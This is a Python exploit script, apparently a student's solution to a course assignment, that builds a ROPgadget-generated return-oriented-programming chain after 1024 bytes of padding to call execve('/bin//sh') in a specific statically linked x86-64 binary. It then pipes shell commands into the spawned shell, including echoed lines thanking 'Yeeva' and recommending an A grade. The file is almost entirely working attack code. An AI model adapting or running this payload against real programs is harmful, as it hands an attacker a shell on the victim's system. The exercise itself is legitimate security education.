#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack
import sys

# Padding goes here
bufferSize = 1024
p = b'\x90'*bufferSize

p += pack('<Q', 0x000000000040a1ce) # pop rsi ; ret
p += pack('<Q', 0x00000000004c70e0) # @ .data
p += pack('<Q', 0x00000000004517c7) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x0000000000454045) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a1ce) # pop rsi ; ret
p += pack('<Q', 0x00000000004c70e8) # @ .data + 8
p += pack('<Q', 0x000000000043fcb9) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000454045) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401946) # pop rdi ; ret
p += pack('<Q', 0x00000000004c70e0) # @ .data
p += pack('<Q', 0x000000000040a1ce) # pop rsi ; ret
p += pack('<Q', 0x00000000004c70e8) # @ .data + 8
p += pack('<Q', 0x0000000000401712) # pop rdx ; ret
p += pack('<Q', 0x00000000004c70e8) # @ .data + 8
p += pack('<Q', 0x000000000043fcb9) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000478e70) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401f14) # syscall

sys.stdout.buffer.write(p) # spawn da shell
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'\n' * 10000) # nop sled
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'echo ""\n')
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'echo "Thank you, Yeeva."\n')
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'echo "I recommend that you get a grade of A on this assignment."\n')
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'exit\n')
sys.stdout.buffer.flush()


